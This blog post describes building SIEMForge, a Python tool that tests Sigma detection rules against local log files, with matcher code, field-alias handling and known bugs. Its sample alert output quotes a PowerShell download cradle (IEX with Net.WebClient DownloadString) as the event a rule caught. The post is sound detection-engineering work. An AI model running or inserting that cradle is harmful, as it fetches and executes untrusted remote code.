If you have a Windows machine and 30 seconds:

git clone https://github.com/TiltedLunar123/WinRecon
cd WinRecon
python -m winrecon

It writes the HTML to ./winrecon_reports/. Open it. Tell me which check is wrong on your box. That is actually the most useful feedback I can get right now.

Repo: https://github.com/TiltedLunar123/WinRecon

Testing Sigma Rules Against Local Logs Without a SIEM

TiltedLunar123 — Wed, 06 May 2026 13:23:48 +0000

I'd written a few Sigma rules for my home lab and wanted to know if they actually fired on real Sysmon events. The standard answer is "deploy to Wazuh and replay logs". That's a lot of overhead when I just want to confirm a regex matches.

So I built SIEMForge. It's a Python CLI that loads Sigma YAML files, parses the detection logic, and matches it against JSON, JSONL, syslog, or CSV log files locally. No SIEM required.

This post is the messy version of how it came together. The final code is on GitHub at github.com/TiltedLunar123/SIEMForge.

The problem

I had ten Sigma rules covering things like LSASS dumps, suspicious PowerShell, and registry persistence. To validate them I'd been:

starting Wazuh in a VM
shipping a Sysmon JSONL via filebeat
SSHing to the manager and tailing alerts.log
realizing the rule didn't fire because I had a typo in the field name

Round trip on a single rule edit was about 4 minutes. For ten rules iterating through false positive checks, the math gets bad.

What I actually wanted: siemforge --scan events.json and a list of which rules fired with which event ID.

First attempt: just regex everything

Naive plan. Sigma rules look simple. They have a detection block with selection, filter, and condition keys. The condition usually says selection and not filter. How hard can it be?

Hard. The condition language allows:

selection
selection and filter
selection or filter
selection and not filter
1 of selection*
all of them

I started with a bare boolean parser that handled and, or, not. About 70% of my rules worked. The 1 of selection* ones broke. So did the wildcards in field values like CommandLine|contains: '*-ep bypass*'.

I rewrote the matcher around a small expression tree instead of regex. Each detection block compiles to a callable: given an event dict, return bool. The condition is parsed once at load and evaluated per event.

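from typing import Callable

def compile_selection(selection: dict) -> Callable[[dict], bool]:
    # Every field condition in a selection must match (implicit AND).
    matchers = []
    for key, value in selection.items():
        # "CommandLine|contains" -> field "CommandLine", modifier "contains"
        field, _, modifier = key.partition("|")
        matcher = build_field_matcher(field, modifier or "equals", value)
        matchers.append(matcher)
    return lambda event: all(m(event) for m in matchers)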

build_field_matcher handles contains, startswith, endswith, and re modifiers. Wildcards in raw values (*-ep bypass*) get translated to a contains check at compile time.
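For a sense of what a matcher factory like that involves, here is a simplified sketch. It is not the SIEMForge implementation. The case-insensitive comparison follows Sigma's default for plain strings, while the list handling ("any value matches") and the wildcard translation rules are assumptions about how the real one behaves.

```python
import re
from typing import Any, Callable


def _single_test(modifier: str, pattern: str) -> Callable[[str], bool]:
    """Build a test for one pattern under one modifier."""
    if modifier == "re":
        compiled = re.compile(pattern)
        return lambda actual: compiled.search(actual) is not None

    leading, trailing = pattern.startswith("*"), pattern.endswith("*")
    needle = pattern.strip("*").lower()
    if modifier == "equals":
        # Raw wildcards: *x* -> contains, *x -> endswith, x* -> startswith.
        if leading and trailing:
            modifier = "contains"
        elif leading:
            modifier = "endswith"
        elif trailing:
            modifier = "startswith"

    if modifier == "contains":
        return lambda actual: needle in actual.lower()
    if modifier == "startswith":
        return lambda actual: actual.lower().startswith(needle)
    if modifier == "endswith":
        return lambda actual: actual.lower().endswith(needle)
    if modifier == "equals":
        return lambda actual: actual.lower() == needle
    raise ValueError(f"unsupported modifier: {modifier}")


def build_field_matcher(field: str, modifier: str, value: Any) -> Callable[[dict], bool]:
    """Return event -> bool for one field; a list of values means any-of."""
    values = value if isinstance(value, list) else [value]
    tests = [_single_test(modifier, str(v)) for v in values]

    def matcher(event: dict) -> bool:
        if field not in event:
            return False
        actual = str(event[field])
        return any(test(actual) for test in tests)

    return matcher


match = build_field_matcher("CommandLine", "contains", "*-ep bypass*")
print(match({"CommandLine": "powershell -EP Bypass -c whoami"}))
```

Wildcards in the middle of a value are not handled here. They would need a translation to regex.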

The field name problem

Sysmon JSON via Wazuh ships fields as process.command_line. Raw Sysmon EVTX via EvtxECmd ships them as CommandLine. Splunk ships them as CommandLine too but inside a _raw blob.

My rules were written against the EVTX naming. When I tested against the Wazuh-formatted JSON, nothing matched. Took me an hour to figure out why.

Two options: rewrite all the rules, or normalize the events. I went with normalize. There's a field_aliases.yml that maps common variants:

CommandLine:
  - process.command_line
  - data.win.eventdata.commandLine
  - winlog.event_data.CommandLine

The scanner tries each alias when the canonical field is missing. Not pretty but it stopped me from owning two copies of every rule.
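The lookup can be sketched as follows. To keep it dependency-free, the alias table is inlined as a dict rather than loaded from field_aliases.yml. Support for both nested dicts and flat dotted keys is an assumption about the event shapes, and `get_path` and `resolve_field` are hypothetical names.

```python
FIELD_ALIASES = {
    "CommandLine": [
        "process.command_line",
        "data.win.eventdata.commandLine",
        "winlog.event_data.CommandLine",
    ],
}

_MISSING = object()  # sentinel so a stored None still counts as "found"


def get_path(event, dotted):
    """Look up 'a.b.c' as a flat key first, then as nested dicts."""
    if dotted in event:
        return event[dotted]
    current = event
    for part in dotted.split("."):
        if not isinstance(current, dict) or part not in current:
            return _MISSING
        current = current[part]
    return current


def resolve_field(event, canonical, aliases=FIELD_ALIASES):
    """Try the canonical name, then each alias in order; None if absent."""
    for name in [canonical, *aliases.get(canonical, [])]:
        value = get_path(event, name)
        if value is not _MISSING:
            return value
    return None


wazuh_style = {"process": {"command_line": "powershell -ep bypass"}}
print(resolve_field(wazuh_style, "CommandLine"))
```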

What actually works

After three rewrites the scanner runs on a 4823-event Sysmon dump in under a second. Output looks like:

[*] Scanning /var/log/sysmon/events.jsonl (jsonl, 4823 events)

[ALERT] Rule: Suspicious PowerShell Download Cradle
        Technique: T1059.001
        Event #312 | 2026-03-14T08:41:02Z
        CommandLine: powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(...)"

[*] Scan complete: 2 alerts across 4823 events

That's the round trip I wanted. Edit a rule, rerun, see if it fires. About 2 seconds end to end now.

The Sigma to Splunk/Elastic/Kibana converter is a side benefit. Same compiled tree, different emit step.

What's broken

Plenty.

The syslog parser is held together with tape. RFC 3164 vs RFC 5424 timestamp detection works on the obvious cases, but if the host writes a non-standard date format (looking at you, pfSense) fields end up mis-split. I have a TODO to switch to pyparsing instead of my hand-rolled tokenizer.

The MITRE coverage matrix is per-rule, not per-technique. It tells you which rule covers which technique, but not which techniques you have zero coverage on. That's the actually useful direction. v3.2 work.

Sigma's 1 of operator is implemented for selection groups but not for conditions like 1 of selection_*. About 10% of public Sigma rules use that pattern, so the rule loader currently warns and skips them.
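One way the wildcard form could be supported is to expand the pattern against the names of the compiled selections and fold the results with `any` or `all`. The sketch below is a possible approach, not what SIEMForge does today. `compile_quantifier` is a hypothetical name, and treating `them` as "every named block" is a simplification.

```python
from fnmatch import fnmatchcase


def compile_quantifier(quantifier, pattern, selections):
    """Compile '1 of <pattern>' or 'all of <pattern>' into event -> bool.

    selections maps block names to already-compiled callables.
    """
    if pattern == "them":
        targets = list(selections.values())
    else:
        targets = [fn for name, fn in selections.items()
                   if fnmatchcase(name, pattern)]
    if not targets:
        raise ValueError(f"no detection blocks match {pattern!r}")

    if quantifier == "1":
        return lambda event: any(t(event) for t in targets)
    if quantifier == "all":
        return lambda event: all(t(event) for t in targets)
    raise ValueError(f"unsupported quantifier: {quantifier}")


selections = {
    "selection_ps": lambda e: "powershell" in e.get("CommandLine", ""),
    "selection_cmd": lambda e: "cmd.exe" in e.get("CommandLine", ""),
    "filter": lambda e: e.get("User") == "SYSTEM",
}

one_of = compile_quantifier("1", "selection_*", selections)
print(one_of({"CommandLine": "cmd.exe /c dir"}))
```

Because the expansion happens once at load time, the per-event cost stays the same as for a plain selection.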

What I'd do differently

I should have started with the reference Sigma backend (pySigma) instead of writing a parser from scratch. By the time I realized that, I'd already shipped two converters and ripping it out felt worse than maintaining the homegrown one. If I started today I'd wrap pySigma and add my own scanner on top.

Test data. I waited too long to build sample log files for each technique. Now there's a samples/ directory with process injection, service installation, user creation, CSV examples, and a clean baseline for false positive checks. Should have been there from commit one.

CI. I added it at v3.0 after a regression broke the Splunk converter on Windows. 138 tests run on every push now. Worth the upfront cost.

Use it

git clone https://github.com/TiltedLunar123/SIEMForge.git
cd SIEMForge
pip install pyyaml
python -m siemforge --scan samples/events.jsonl

If you write Sigma rules and hate the deploy-test loop, give it a try. Issues and PRs welcome. There's a CONTRIBUTING file with rule submission guidelines.

Repo: https://github.com/TiltedLunar123/SIEMForge